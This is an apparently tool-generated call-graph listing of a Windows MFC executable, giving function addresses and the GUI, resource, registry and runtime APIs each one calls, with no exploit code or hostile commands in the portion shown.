42484->42479 42486->42394 42488 4014c8 ctype 42487->42488 42489 4014d6 RegQueryValueExA 42488->42489 42490 401090 ctype 82 API calls 42488->42490 42489->42400 42489->42402 42490->42489 42493 40a366 42491->42493 42514 401280 42493->42514 42519 404aeb 42495->42519 42499 406045 __EH_prolog3 ctype 42498->42499 42567 401420 42499->42567 42504 406073 std::_Locinfo::~_Locinfo 42504->42397 42507 43065a IsDebuggerPresent 42506->42507 42508 430658 42506->42508 42608 43f5db 42507->42608 42508->42405 42511 436679 SetUnhandledExceptionFilter UnhandledExceptionFilter 42512 436696 __invoke_watson 42511->42512 42513 43669e GetCurrentProcess TerminateProcess 42511->42513 42512->42513 42513->42405 42515 401288 42514->42515 42516 401090 ctype 82 API calls 42515->42516 42517 40128f 42515->42517 42518 4012a5 42516->42518 42517->42400 42521 404afc 42519->42521 42520 404b08 42520->42397 42521->42520 42522 404b29 42521->42522 42525 4012b0 42521->42525 42534 43065f 69 API calls 3 library calls 42522->42534 42526 401090 ctype 82 API calls 42525->42526 42527 4012ba 42526->42527 42535 41481d 42527->42535 42529 4012f4 42539 43065f 69 API calls 3 library calls 42529->42539 42530 4012b0 82 API calls 42530->42529 42532 40130c 42532->42522 42534->42520 42536 414831 42535->42536 42538 4012e9 42535->42538 42540 43108c 42536->42540 42538->42529 42538->42530 42539->42532 42541 43113f 42540->42541 42550 43109e 42540->42550 42565 43add9 7 API calls __decode_pointer 42541->42565 42543 431145 42566 431d3e 69 API calls __getptd_noexit 42543->42566 42548 4310fb RtlAllocateHeap 42548->42550 42550->42548 42551 4310af 42550->42551 42552 43112b 42550->42552 42555 431130 42550->42555 42557 431137 42550->42557 42561 43103d 69 API calls 4 library calls 42550->42561 42562 43add9 7 API calls __decode_pointer 42550->42562 42551->42550 42558 43ad91 69 API calls 2 library calls 42551->42558 42559 43abe6 69 API calls 7 library calls 42551->42559 42560 4339b3 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 42551->42560 42563 431d3e 69 API calls __getptd_noexit 42552->42563 42564 431d3e 69 API calls __getptd_noexit 42555->42564 42557->42538 42558->42551 42559->42551 42561->42550 42562->42550 42563->42555 42564->42557 42565->42543 42566->42557 42568 40142b 42567->42568 42570 401435 42567->42570 42569 401090 ctype 82 API calls 42568->42569 42569->42570 42571 405e9c 42570->42571 42572 405ea8 42571->42572 42573 405ebb 42571->42573 42572->42573 42582 402720 42572->42582 42573->42504 42575 402ca0 42573->42575 42576 402cab 42575->42576 42577 402cba 42575->42577 42606 4025c0 82 API calls 3 library calls 42576->42606 42577->42577 42607 4025c0 82 API calls 3 library calls 42577->42607 42579 402cb4 42579->42504 42581 402cd3 42581->42504 42588 41b293 112 API calls ctype 42582->42588 42584 40272e 42585 402732 42584->42585 42589 402500 FindResourceA 42584->42589 42585->42573 42587 402740 42587->42573 42588->42584 42590 402524 42589->42590 42591 402535 42589->42591 42601 4019e0 LoadResource 42590->42601 42591->42587 42593 40252c 42593->42591 42594 40253d WideCharToMultiByte 42593->42594 42595 402570 ctype 42594->42595 42596 402578 WideCharToMultiByte 42594->42596 42595->42596 42597 402594 42596->42597 42598 40259b 42597->42598 42599 401090 ctype 82 API calls 42597->42599 42598->42587 42600 4025b9 42599->42600 42602 4019f6 42601->42602 42603 4019f9 LockResource 42601->42603 42602->42593 42604 401a1a 42603->42604 42605 401a07 SizeofResource 42603->42605 42604->42593 42605->42604 42606->42579 42607->42581 42608->42511 42609->42376 42611 40aceb __EH_prolog3 42610->42611 42612 4014c0 ctype 82 API calls 42611->42612 42613 40acfe 42612->42613 42614 402720 118 API calls 42613->42614 42615 40ad0b 42614->42615 42616 40ad22 42615->42616 42710 41b29e 83 API calls 2 library calls 42615->42710 42632 411f96 42616->42632 42622 405562 82 API calls 42623 40ad45 42622->42623 42687 40af79 42623->42687 42625 40ada7 42698 408862 42625->42698 42626 40ad9c GetMenu 42626->42625 42628 40adb8 42629 40ad6f ctype std::_Locinfo::~_Locinfo 42628->42629 42701 40f918 GetTopWindow 42628->42701 42629->42337 42633 41f363 ctype 112 API calls 42632->42633 42635 411fa3 _memset 42633->42635 42634 40ad29 42677 408c1d 42634->42677 42635->42634 42636 41f363 ctype 112 API calls 42635->42636 42637 411fdb 42636->42637 42638 41200c 42637->42638 42723 411c95 118 API calls 3 library calls 42637->42723 42640 41202e 42638->42640 42724 411c95 118 API calls 3 library calls 42638->42724 42642 412055 42640->42642 42725 411c95 118 API calls 3 library calls 42640->42725 42643 41207b 42642->42643 42726 411f52 120 API calls ctype 42642->42726 42646 4120a8 42643->42646 42727 411f52 120 API calls ctype 42643->42727 42648 4120c9 42646->42648 42649 40f52e 118 API calls 42646->42649 42650 4120ea 42648->42650 42652 40f52e 118 API calls 42648->42652 42649->42648 42651 412107 42650->42651 42653 40f52e 118 API calls 42650->42653 42654 40f52e 118 API calls 42651->42654 42655 412120 42651->42655 42652->42650 42653->42651 42654->42655 42656 40f52e 118 API calls 42655->42656 42657 41213d 42655->42657 42656->42657 42658 41215a 42657->42658 42660 40f52e 118 API calls 42657->42660 42659 412177 42658->42659 42661 40f52e 118 API calls 42658->42661 42662 412194 42659->42662 42711 40f52e 42659->42711 42660->42658 42661->42659 42664 4121b1 42662->42664 42665 40f52e 118 API calls 42662->42665 42666 4121ca 42664->42666 42668 40f52e 118 API calls 42664->42668 42665->42664 42667 4121e3 42666->42667 42669 40f52e 118 API calls 42666->42669 42670 412200 42667->42670 42671 40f52e 118 API calls 42667->42671 42668->42666 42669->42667 42672 41221d 42670->42672 42673 40f52e 118 API calls 42670->42673 42671->42670 42674 412236 42672->42674 42675 40f52e 118 API calls 42672->42675 42673->42672 42674->42634 42676 40f52e 118 API calls 42674->42676 42675->42674 42676->42634 42678 41f363 ctype 112 API calls 42677->42678 42679 408c2e LoadIconA 42678->42679 42680 408c43 _memset 42679->42680 42686 408c9a 42679->42686 42681 41f363 ctype 112 API calls 42680->42681 42680->42686 42682 408c6f 42681->42682 42739 4086b0 115 API calls 2 library calls 42682->42739 42684 408c7f 42684->42686 42740 411d22 142 API calls 3 library calls 42684->42740 42686->42622 42688 40afb4 42687->42688 42689 40af8d 42687->42689 42691 402ca0 ctype 82 API calls 42688->42691 42690 41f363 ctype 112 API calls 42689->42690 42692 40af92 LoadMenuA 42690->42692 42693 40afc2 42691->42693 42692->42688 42695 40ad6b 42692->42695 42741 410f67 42693->42741 42695->42625 42695->42626 42695->42629 42696 40b011 DestroyMenu 42696->42695 42699 41f363 ctype 112 API calls 42698->42699 42700 40886f LoadAcceleratorsA 42699->42700 42700->42628 42707 40f92c 42701->42707 42702 40f991 42702->42629 42703 40f950 SendMessageA 42703->42707 42705 40f982 GetWindow 42705->42707 42706 40f966 GetTopWindow 42706->42705 42706->42707 42707->42702 42707->42703 42707->42705 42707->42706 42709 40f918 449 API calls 42707->42709 42795 40ee68 42707->42795 42800 40f62d 42707->42800 42709->42705 42710->42616 42712 41f363 ctype 112 API calls 42711->42712 42713 40f540 42712->42713 42728 40ec5e 42713->42728 42716 40f54e 42733 40ed38 117 API calls ctype 42716->42733 42717 40f55f 42718 40f556 42717->42718 42720 41f363 ctype 112 API calls 42717->42720 42718->42662 42721 40f571 42720->42721 42734 40ebea 115 API calls 3 library calls 42721->42734 42723->42638 42724->42640 42725->42642 42726->42643 42727->42646 42729 40ec80 42728->42729 42730 40ec6c 42728->42730 42729->42716 42729->42717 42735 407887 42730->42735 42733->42718 42734->42718 42736 407892 GetModuleHandleA 42735->42736 42737 4078b6 GetProcAddress 42735->42737 42736->42737 42738 4078a2 LoadLibraryA 42736->42738 42737->42729 42738->42737 42739->42684 42740->42686 42742 410f8b 42741->42742 42745 410f7a 42741->42745 42743 41f363 ctype 112 API calls 42742->42743 42744 410fc9 42743->42744 42749 40b007 42744->42749 42753 410f0d 42744->42753 42745->42742 42771 406436 2 API calls 4 library calls 42745->42771 42749->42695 42749->42696 42751 411021 42772 40eef5 42751->42772 42754 420aec ctype 106 API calls 42753->42754 42755 410f23 42754->42755 42756 410f2e 42755->42756 42781 406436 2 API calls 4 library calls 42755->42781 42758 410f5e 42756->42758 42759 410f3c GetCurrentThreadId SetWindowsHookExA 42756->42759 42762 40492c 42758->42762 42759->42758 42760 410f59 42759->42760 42782 4063fe RaiseException __CxxThrowException@8 42760->42782 42763 404938 __lseeki64 42762->42763 42764 41f363 ctype 112 API calls 42763->42764 42765 404946 42764->42765 42783 41ead7 42765->42783 42767 404951 42768 40495f CreateWindowExA 42767->42768 42770 40495b __lseeki64 42767->42770 42787 4049a6 42768->42787 42770->42751 42771->42742 42773 420aec ctype 106 API calls 42772->42773 42774 40ef07 42773->42774 42775 40ef12 42774->42775 42794 406436 2 API calls 4 library calls 42774->42794 42777 41f363 ctype 112 API calls 42775->42777 42778 40ef17 42777->42778 42779 40ef2f 42778->42779 42780 40ef24 UnhookWindowsHookEx 42778->42780 42779->42749 42780->42779 42781->42756 42784 41eae2 42783->42784 42786 41eae7 ctype 42783->42786 42793 406436 2 API calls 4 library calls 42784->42793 42786->42767 42788 4049da 42787->42788 42789 4049ac 42787->42789 42788->42770 42790 4049ba GetLastError 42789->42790 42791 4049c4 ctype 42789->42791 42790->42791 42791->42788 42792 4049d3 SetLastError 42791->42792 42792->42788 42793->42786 42794->42775 42813 40edc8 42795->42813 42797 40ee74 42799 40ee85 42797->42799 42821 406436 2 API calls 4 library calls 42797->42821 42799->42707 42801 40f639 __EH_prolog3_catch 42800->42801 42802 420aec ctype 106 API calls 42801->42802 42803 40f648 42802->42803 42804 40f65f 42803->42804 42856 406436 2 API calls 4 library calls 42803->42856 42806 40f6b6 42804->42806 42857 40d7c1 GetWindowRect GetWindowLongA 42804->42857 42831 422024 42806->42831 42845 40cdeb 42806->42845 42808 40f6c7 42809 40f6df std::_Locinfo::~_Locinfo 42808->42809 42858 40f5b7 148 API calls ctype 42808->42858 42809->42707 42814 40edd4 __EH_prolog3 42813->42814 42822 41f396 42814->42822 42816 40ee20 std::_Locinfo::~_Locinfo ~_Task_impl 42816->42797 42817 40edd9 ~_Task_impl 42817->42816 42818 404461 std::ios_base::_Init 69 API calls 42817->42818 42819 40edfa 42818->42819 42819->42816 42827 42474e 71 API calls 3 library calls 42819->42827 42821->42799 42823 41f363 ctype 112 API calls 42822->42823 42824 41f39b 42823->42824 42828 409f26 42824->42828 42827->42816 42829 420aec ctype 106 API calls 42828->42829 42830 409f30 42829->42830 42830->42817 42832 4220fe 42831->42832 42835 42203c 42831->42835 42833 40cdeb 453 API calls 42832->42833 42834 422073 42833->42834 42834->42808 42835->42832 42835->42834 42836 422097 42835->42836 42837 422085 42835->42837 42860 410293 42836->42860 42837->42836 42838 422089 42837->42838 42859 403ac0 SendMessageA 42838->42859 42843 422095 42843->42834 42844 4220a8 42844->42832 42844->42834 42919 401180 42845->42919 42941 4115c3 42845->42941 42948 4221c7 42845->42948 42951 40ed96 42845->42951 42959 4110c4 42845->42959 42846 40ce0f 42847 40ce26 42846->42847 43039 40ccc8 42846->43039 43044 4044b6 DefFrameProcA 42846->43044 43045 404644 DefMDIChildProcA 42846->43045 42847->42808 42856->42804 42857->42806 42858->42809 42859->42843 42861 4102a3 42860->42861 42862 41029a GetParent 42860->42862 42866 40ee3c 42861->42866 42862->42861 42865 403ac0 SendMessageA 42865->42844 42867 40edc8 ~_Task_impl 112 API calls 42866->42867 42868 40ee4a 42867->42868 42873 4247d7 42868->42873 42870 40ee56 42885 412d43 42870->42885 42874 4247e3 __EH_prolog3_catch 42873->42874 42877 4247ec std::_Locinfo::~_Locinfo ~_Task_impl 42874->42877 42890 424500 42874->42890 42877->42870 42878 424500 ~_Task_impl 2 API calls 42879 42480c ~_Task_impl 42878->42879 42879->42877 42894 42fba4 42879->42894 42882 424846 42899 4246c7 42882->42899 42886 40ee60 42885->42886 42887 412d4f 42885->42887 42886->42865 42887->42886 42888 412d55 GetParent 42887->42888 42889 424500 ~_Task_impl 2 API calls 42888->42889 42889->42886 42891 424509 42890->42891 42892 42450e 42890->42892 42905 406436 2 API calls 4 library calls 42891->42905 42892->42877 42892->42878 42895 42fbaf 42894->42895 42897 42483b 42894->42897 42906 423a41 42895->42906 42897->42882 42898 4063fe RaiseException __CxxThrowException@8 42897->42898 42900 4246e2 ~_Task_impl 42899->42900 42901 4246f7 42900->42901 42904 4246fe 42900->42904 42914 42441c 69 API calls 3 library calls 42900->42914 42915 424677 42901->42915 42904->42877 42905->42892 42907 423a6e 42906->42907 42908 423a4d 42906->42908 42909 406436 ~_Task_impl LocalAlloc RaiseException 42907->42909 42908->42907 42910 423a53 42908->42910 42912 423a73 42909->42912 42911 404461 std::ios_base::_Init 69 API calls 42910->42911 42913 423a60 42911->42913 42913->42897 42914->42901 42916 424690 42915->42916 42917 424682 42915->42917 42916->42904 42918 423a41 ~_Task_impl 71 API calls 42917->42918 42918->42916 43046 40a58e 42919->43046 42922 401192 42922->42846 42924 401251 42924->42846 42930 401248 42930->42846 42932 401218 42932->42930 43093 413276 42932->43093 42934 401228 43099 412f2d 42934->43099 42936 401234 43107 412fbe 42936->43107 42942 41f4e8 112 API calls 42941->42942 42943 4115c9 42942->42943 43381 4134c3 CopyRect 42943->43381 42946 41167e 42946->42846 43424 422111 42948->43424 42952 420aec ctype 106 API calls 42951->42952 42953 40edaa 42952->42953 42954 40edb3 42953->42954 43463 406436 2 API calls 4 library calls 42953->43463 42958 40ccc8 2 API calls 42954->42958 43462 404644 DefMDIChildProcA 42954->43462 42956 40edc6 42956->42846 42958->42956 42960 4110d0 __EH_prolog3 42959->42960 42961 411155 42960->42961 42962 411145 42960->42962 42964 4110ec 42960->42964 42967 41115a 42961->42967 42974 41116e 42961->42974 42965 40ee3c ~_Task_impl 113 API calls 42962->42965 42963 411138 43496 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42963->43496 42964->42963 43021 411102 42964->43021 42968 41114b 42965->42968 43492 410af5 121 API calls 2 library calls 42967->43492 43491 410a7d 120 API calls 42968->43491 42969 4112e0 std::_Locinfo::~_Locinfo 42969->42846 42972 41116a 42972->42974 42972->43021 42974->43021 43464 40d713 42974->43464 42975 41167e 42975->42846 42978 4112c5 43495 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42978->43495 42981 41121d 43032 4134c3 140 API calls 42981->43032 42982 41120c 42982->42963 42982->42978 42982->42981 42984 4114b7 42982->42984 42985 411342 42982->42985 42986 4114c4 42982->42986 42987 411506 42982->42987 42988 411302 42982->42988 42989 41148d 42982->42989 42990 411350 42982->42990 42991 411498 42982->42991 42992 41141b 42982->42992 42993 41131a 42982->42993 42994 4114a2 42982->42994 42995 4114e4 42982->42995 42996 411326 42982->42996 42997 411472 42982->42997 42998 4114f2 42982->42998 42999 4113f4 42982->42999 43000 4112fa 42982->43000 43010 41164a 42982->43010 43011 41145c 42982->43011 43016 41142a 42982->43016 42982->43021 43025 4113bd 42982->43025 43494 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42982->43494 43017 40ee3c ~_Task_impl 113 API calls 42984->43017 43007 40ee3c ~_Task_impl 113 API calls 42985->43007 43018 40ee3c ~_Task_impl 113 API calls 42986->43018 43019 40ee3c ~_Task_impl 113 API calls 42987->43019 42987->43021 43035 40ed96 109 API calls 42988->43035 43470 404801 42988->43470 43473 40547d 42988->43473 43505 422d89 112 API calls ctype 42989->43505 43498 40d77c 112 API calls 42990->43498 43005 41f4e8 112 API calls 42991->43005 43013 41f4e8 112 API calls 42992->43013 43002 40ee3c ~_Task_impl 113 API calls 42993->43002 43006 41f4e8 112 API calls 42994->43006 43008 40ee3c ~_Task_impl 113 API calls 42995->43008 43004 40ee3c ~_Task_impl 113 API calls 42996->43004 43001 40ee3c ~_Task_impl 113 API calls 42997->43001 43009 40ee3c ~_Task_impl 113 API calls 42998->43009 43012 40ee3c ~_Task_impl 113 API calls 42999->43012 43497 422d89 112 API calls ctype 43000->43497 43015 41147a 43001->43015 43002->43021 43004->43021 43005->43016 43006->43011 43007->42981 43008->43021 43009->43011 43506 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43010->43506 43486 4050e4 43011->43486 43012->43021 43013->43021 43022 40ee3c ~_Task_impl 113 API calls 43015->43022 43478 4074cb 43016->43478 43483 41324e 43016->43483 43017->43016 43018->43011 43019->43011 43507 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43021->43507 43022->43011 43024 41136a 43026 40ee68 112 API calls 43024->43026 43500 422e06 43025->43500 43027 41137c 43026->43027 43029 411392 43027->43029 43030 424500 ~_Task_impl 2 API calls 43027->43030 43499 40f76d 113 API calls 4 library calls 43029->43499 43030->43029 43032->43021 43035->43021 43040 40ccd7 43039->43040 43041 40ccf9 CallWindowProcA 43039->43041 43040->43041 43043 40cce5 DefWindowProcA 43040->43043 43042 40cd0c 43041->43042 43042->42847 43043->43042 43044->42847 43045->42847 43047 40a59a 43046->43047 43048 40a59f 43046->43048 43123 406436 2 API calls 4 library calls 43047->43123 43113 408bca 43048->43113 43052 406d2e 43207 407991 43052->43207 43055 406e6a 43056 41f363 ctype 112 API calls 43055->43056 43057 406e79 FindResourceA 43056->43057 43058 406e92 43057->43058 43062 4011ce 43057->43062 43241 406b0c 83 API calls 2 library calls 43058->43241 43060 406e9b 43242 4065d7 GetObjectA DeleteObject LocalAlloc RaiseException ctype 43060->43242 43062->42924 43063 406673 43062->43063 43064 40669e _memset 43063->43064 43065 406756 43064->43065 43066 412b38 GetWindowLongA 43064->43066 43067 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43065->43067 43066->43064 43068 4011e0 43067->43068 43068->42924 43069 40b7a6 43068->43069 43243 40b954 43069->43243 43072 40c1d8 43073 40c1e4 __EH_prolog3 43072->43073 43250 40bdcd 43073->43250 43076 40c2b8 std::_Locinfo::~_Locinfo 43076->42932 43077 40c2ad 43262 40bf7c 85 API calls 3 library calls 43077->43262 43078 40c20d SendMessageA 43256 422e1f 113 API calls 2 library calls 43078->43256 43081 40c225 43091 40c238 43081->43091 43257 40b938 SelectObject 43081->43257 43083 40c289 43084 40c29e 43083->43084 43260 40b938 SelectObject 43083->43260 43261 422e73 114 API calls 3 library calls 43084->43261 43087 40c2c3 GetSystemMetrics 43087->43091 43088 40c2aa 43088->43077 43089 402720 118 API calls 43089->43091 43091->43083 43091->43087 43091->43089 43258 40bd78 GetTextExtentPoint32A 43091->43258 43259 40be87 82 API calls 3 library calls 43091->43259 43094 413282 __EH_prolog3 43093->43094 43095 404461 std::ios_base::_Init 69 API calls 43094->43095 43098 4132a0 43094->43098 43095->43098 43096 4132d0 std::_Locinfo::~_Locinfo 43096->42934 43097 4132c4 GetParent 43097->43096 43098->43096 43098->43097 43100 412f39 __EH_prolog3 43099->43100 43101 412fb6 std::_Locinfo::~_Locinfo 43100->43101 43103 404461 std::ios_base::_Init 69 API calls 43100->43103 43274 409833 43100->43274 43279 41346c 43100->43279 43287 4133f9 113 API calls 2 library calls 43100->43287 43288 42280e RaiseException __CxxThrowException@8 43100->43288 43101->42936 43103->43100 43108 412fd5 43107->43108 43109 412fcd 43107->43109 43295 412e38 43108->43295 43110 409833 3 API calls 43109->43110 43110->43108 43114 40ed96 109 API calls 43113->43114 43115 408bd7 43114->43115 43116 40118d 43115->43116 43124 408ba3 43115->43124 43128 4085ab 43115->43128 43133 404cb4 43115->43133 43116->42922 43116->43052 43117 408bf1 43117->43116 43118 408bf5 PostMessageA 43117->43118 43140 409c7d 43118->43140 43123->43048 43125 408baf 43124->43125 43127 408bbf 43124->43127 43125->43127 43153 408b24 43125->43153 43127->43117 43129 4085c2 43128->43129 43130 4085b6 GetMenu 43128->43130 43165 41f4e8 43129->43165 43130->43129 43132 4085d7 43132->43117 43134 404cc3 GetMenuItemCount 43133->43134 43135 404cde 43133->43135 43178 4049db 113 API calls 43134->43178 43168 404cf2 43135->43168 43141 409d42 43140->43141 43142 409c97 43140->43142 43141->43116 43179 412b38 43142->43179 43144 409cd0 43145 409d44 43144->43145 43146 409cd9 43144->43146 43182 40f201 43145->43182 43148 40f201 128 API calls 43146->43148 43149 409d02 43148->43149 43150 40f201 128 API calls 43149->43150 43151 409d1c 43150->43151 43203 412d05 43151->43203 43154 408b3b 43153->43154 43155 406436 ~_Task_impl LocalAlloc RaiseException 43154->43155 43156 408b46 43154->43156 43155->43154 43157 41e928 LocalAlloc RaiseException 43156->43157 43158 408b4b 43157->43158 43159 408b51 43158->43159 43164 4185a1 453 API calls 43158->43164 43159->43127 43160 408b7a 43160->43159 43161 412b52 GetWindowLongA 43160->43161 43162 408b85 43161->43162 43162->43159 43163 412b98 GetWindowLongA SetWindowLongA SetWindowPos 43162->43163 43163->43159 43164->43160 43166 41f474 moneypunct 112 API calls 43165->43166 43167 41f4f4 43166->43167 43169 404d0e 43168->43169 43170 404d3e 43169->43170 43171 412b6c GetWindowLongA SetWindowLongA SetWindowPos 43169->43171 43172 41f363 ctype 112 API calls 43170->43172 43171->43170 43173 404d43 43172->43173 43174 40492c 115 API calls 43173->43174 43175 404d68 43174->43175 43176 404d7c BringWindowToTop 43175->43176 43177 404ced 43175->43177 43176->43177 43177->43117 43178->43135 43180 412b4a 43179->43180 43181 412b3e GetWindowLongA 43179->43181 43181->43144 43183 40f226 43182->43183 43184 40f22f GetClientRect 43182->43184 43185 40f259 43183->43185 43186 40f24c BeginDeferWindowPos 43183->43186 43184->43183 43187 40f25d GetTopWindow 43185->43187 43186->43187 43196 40f279 43187->43196 43188 40f2b1 43190 40f2e1 43188->43190 43191 40f2b7 43188->43191 43189 40f26a GetDlgCtrlID 43192 40ee68 112 API calls 43189->43192 43195 40f338 43190->43195 43199 40ee3c ~_Task_impl 113 API calls 43190->43199 43193 40f2cb 43191->43193 43194 40f2bc CopyRect 43191->43194 43192->43196 43193->43141 43194->43193 43195->43193 43197 40f33d KiUserCallbackDispatcher 43195->43197 43196->43188 43196->43189 43198 40f2a2 GetWindow 43196->43198 43200 40f291 SendMessageA 43196->43200 43197->43193 43198->43196 43201 40f2f3 43199->43201 43200->43198 43201->43195 43202 40cee2 7 API calls 43201->43202 43202->43195 43204 412d10 SetWindowPos 43203->43204 43205 412d37 43203->43205 43204->43141 43208 4079a6 43207->43208 43209 411f96 126 API calls 43208->43209 43210 4079d0 43209->43210 43221 40791d 43210->43221 43217 4011ba 43217->42924 43217->43055 43218 407a0f 43240 406db6 IsWindow SendMessageA SendMessageA SendMessageA InvalidateRect 43218->43240 43220 407a2e 43220->43217 43222 40798f 43221->43222 43223 40792f 43221->43223 43229 4064f0 43222->43229 43224 41f363 ctype 112 API calls 43223->43224 43225 407936 43224->43225 43226 407887 ctype 2 API calls 43225->43226 43227 407940 GetProcAddress 43226->43227 43228 407957 _memset 43227->43228 43228->43222 43230 406505 GetDC GetSystemMetrics CreateFontA 43229->43230 43231 406588 SetRectEmpty 43229->43231 43232 406551 GetCharWidthA 43230->43232 43233 406548 SelectObject 43230->43233 43236 40d84a 43231->43236 43234 406576 ReleaseDC 43232->43234 43235 406567 SelectObject DeleteObject 43232->43235 43233->43232 43234->43231 43235->43234 43237 40d859 43236->43237 43239 410f67 118 API calls 43237->43239 43238 407a0b 43238->43217 43238->43218 43239->43238 43240->43220 43241->43060 43242->43062 43244 412b38 GetWindowLongA 43243->43244 43245 40b983 43244->43245 43246 411f96 126 API calls 43245->43246 43247 40b99a SetRectEmpty 43246->43247 43248 40d84a 118 API calls 43247->43248 43249 401206 43248->43249 43249->42930 43249->43072 43251 40bde1 ctype 43250->43251 43263 420da0 43251->43263 43253 40be28 43253->43076 43253->43077 43253->43078 43254 40be03 43254->43253 43255 4014c0 ctype 82 API calls 43254->43255 43255->43254 43256->43081 43257->43091 43258->43091 43259->43091 43260->43084 43261->43088 43262->43076 43266 420db3 43263->43266 43265 420dd9 43270 420de9 43265->43270 43273 4316f6 69 API calls 6 library calls 43265->43273 43266->43265 43267 420dd0 43266->43267 43271 406436 2 API calls 4 library calls 43266->43271 43272 434693 69 API calls 2 library calls 43267->43272 43270->43254 43271->43266 43272->43265 43273->43270 43275 409843 43274->43275 43276 40983f 43274->43276 43275->43276 43289 408692 43275->43289 43276->43100 43280 413482 43279->43280 43281 41347d 43279->43281 43283 411f96 126 API calls 43280->43283 43294 406436 2 API calls 4 library calls 43281->43294 43284 413497 SetRectEmpty 43283->43284 43285 40d84a 118 API calls 43284->43285 43286 4134be 43285->43286 43286->43100 43287->43100 43290 4086a0 43289->43290 43291 4086a5 GetDlgCtrlID 43289->43291 43293 406436 2 API calls 4 library calls 43290->43293 43291->43275 43291->43276 43293->43291 43294->43280 43299 412e45 43295->43299 43297 412e87 43302 414166 43297->43302 43299->43297 43301 409833 3 API calls 43299->43301 43349 406436 2 API calls 4 library calls 43299->43349 43301->43299 43303 414198 43302->43303 43305 4141a1 GetWindowRect 43303->43305 43370 406436 2 API calls 4 library calls 43303->43370 43306 4141e0 43305->43306 43307 4141b9 43305->43307 43309 41423c 43306->43309 43350 412d87 43306->43350 43308 4141c5 EqualRect 43307->43308 43348 414422 43307->43348 43308->43306 43308->43348 43371 420d66 115 API calls 43309->43371 43310 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43312 401240 43310->43312 43312->42846 43313 41422d 43359 41fc5a 43313->43359 43316 414270 43317 41427e IsWindowVisible 43316->43317 43326 41429c 43316->43326 43320 41428b 43317->43320 43317->43326 43318 4142b9 43372 413342 CopyRect 43318->43372 43319 41436e 43375 4133a2 71 API calls 43319->43375 43323 412d05 SetWindowPos 43320->43323 43323->43326 43324 4142ca 43373 422bfb GetWindowLongA ScreenToClient ScreenToClient 43324->43373 43325 41437a 43376 4133a2 71 API calls 43325->43376 43326->43318 43326->43319 43329 4142d8 43374 41365c 75 API calls 2 library calls 43329->43374 43330 414386 43332 412d05 SetWindowPos 43330->43332 43334 4143a5 GetParent 43332->43334 43333 414326 43336 412d05 SetWindowPos 43333->43336 43335 40ee3c ~_Task_impl 113 API calls 43334->43335 43337 4143b4 43335->43337 43338 414364 43336->43338 43341 4143c0 43337->43341 43377 4133d6 114 API calls ~_Task_impl 43337->43377 43338->43334 43340 4143f7 43343 414413 43340->43343 43344 412d05 SetWindowPos 43340->43344 43341->43340 43378 413a2c 117 API calls 2 library calls 43341->43378 43379 4139c3 72 API calls ctype 43343->43379 43344->43343 43346 41441b 43380 408487 114 API calls ~_Task_impl 43346->43380 43348->43310 43349->43299 43351 412d93 __EH_prolog3 43350->43351 43352 412d9b GetWindowTextA 43351->43352 43353 412dac 43351->43353 43358 412df0 ctype std::_Locinfo::~_Locinfo 43352->43358 43354 4014c0 ctype 82 API calls 43353->43354 43355 412db4 43354->43355 43356 4048ed ctype 79 API calls 43355->43356 43357 412dd7 lstrlenA 43356->43357 43357->43358 43358->43313 43360 41fc7c 43359->43360 43361 406436 ~_Task_impl LocalAlloc RaiseException 43360->43361 43362 41fc85 lstrlenA 43360->43362 43361->43360 43363 41fca8 _memset 43362->43363 43364 41fcb4 GetWindowTextA 43363->43364 43365 41fcd9 SetWindowTextA 43363->43365 43364->43365 43366 41fcc7 lstrcmpA 43364->43366 43367 41fce1 43365->43367 43366->43365 43366->43367 43368 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43367->43368 43369 41fcee 43368->43369 43369->43309 43370->43303 43371->43316 43372->43324 43373->43329 43374->43333 43375->43325 43376->43330 43377->43341 43378->43340 43379->43346 43380->43348 43385 4217b7 43381->43385 43384 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43384->42946 43386 4217cf 43385->43386 43387 411663 43386->43387 43388 4217e8 CopyRect 43386->43388 43387->43384 43389 421819 43388->43389 43393 420e08 43389->43393 43397 413b62 43393->43397 43396 40cee2 7 API calls 43396->43387 43399 413b76 43397->43399 43398 406436 ~_Task_impl LocalAlloc RaiseException 43398->43399 43399->43398 43400 413b89 IsRectEmpty 43399->43400 43402 40f898 ~_Task_impl 114 API calls 43399->43402 43403 413bcb GetClientRect 43399->43403 43400->43399 43401 413b9a 43400->43401 43404 413bf9 BeginDeferWindowPos 43401->43404 43420 413bf3 43401->43420 43402->43399 43403->43401 43404->43420 43405 413fd5 43407 413ff2 SetRectEmpty 43405->43407 43408 413fe9 KiUserCallbackDispatcher 43405->43408 43406 413638 ctype LocalAlloc RaiseException 43406->43420 43409 41400d 43407->43409 43408->43407 43409->43387 43409->43396 43410 413cb5 GetWindowRect 43411 422bfb GetWindowLongA ScreenToClient ScreenToClient 43410->43411 43411->43420 43412 413e35 OffsetRect 43412->43420 43413 413cec OffsetRect 43413->43420 43414 413e84 OffsetRect 43418 413ed3 EqualRect 43414->43418 43415 413d3f OffsetRect 43417 413d5c EqualRect 43415->43417 43416 413e6e OffsetRect 43416->43420 43417->43420 43418->43420 43419 413d25 OffsetRect 43419->43420 43420->43405 43420->43406 43420->43410 43420->43412 43420->43413 43420->43414 43420->43415 43420->43416 43420->43417 43420->43418 43420->43419 43421 40b917 LocalAlloc RaiseException ctype 43420->43421 43422 40cee2 7 API calls 43420->43422 43423 4260f4 71 API calls 43420->43423 43421->43420 43422->43420 43423->43420 43425 412b38 GetWindowLongA 43424->43425 43426 422120 43425->43426 43427 42216a 43426->43427 43428 412d05 SetWindowPos 43426->43428 43429 412b38 GetWindowLongA 43427->43429 43428->43427 43431 422171 43429->43431 43430 4221be 43430->42846 43431->43430 43432 412b38 GetWindowLongA 43431->43432 43434 422184 43431->43434 43432->43434 43433 410293 114 API calls 43435 42218f 43433->43435 43434->43430 43434->43433 43437 4221aa 43435->43437 43448 40f898 114 API calls ~_Task_impl 43435->43448 43437->43430 43439 4077c6 43437->43439 43444 4077e8 43439->43444 43440 40786b 43455 40fbd2 264 API calls 